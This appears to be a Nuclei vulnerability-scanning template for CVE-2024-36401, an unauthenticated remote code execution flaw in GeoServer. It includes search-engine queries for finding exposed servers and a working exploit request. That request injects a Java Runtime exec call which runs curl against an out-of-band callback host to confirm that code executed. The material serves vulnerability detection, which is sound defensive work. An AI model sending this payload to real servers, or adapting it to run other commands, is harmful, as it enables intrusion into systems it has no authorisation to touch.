id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions author: DhiyaneshDk,ryanborum severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. impact: | This vulnerability can lead to executing arbitrary code. reference: - https://x.com/sirifu4k1/status/1808270303275241607 - https://nvd.nist.gov/vuln/detail/CVE-2024-36401 - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv metadata: verified: true max-request: 1 vendor: osgeo product: geoserver shodan-query: "Server: GeoHttpServer" fofa-query: - title="geoserver" - app="geoserver" google-query: intitle:"geoserver" tags: cve,cve2024,geoserver,rce,unauth,kev flow: | if(http(1)) { set("name",template.typename[0]) http(2) } http: - raw: - | GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 Host: {{Hostname}} host-redirects: true extractors: - type: regex name: typename part: body group: 1 regex: - typeName=([^&\]]+) internal: true - raw: - | @timeout 20s GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: content_type words: - "application/xml" # digest: 4a0a00473045022050a925671a91913f98317b73a4f3cda362d8a355507459097e4288b9a30eb0b8022100ce59a57d605ac794ee5929feec3cb4238e33483384b7735a20fdce903db76366:922c64590222798bb761d5b6d8e72950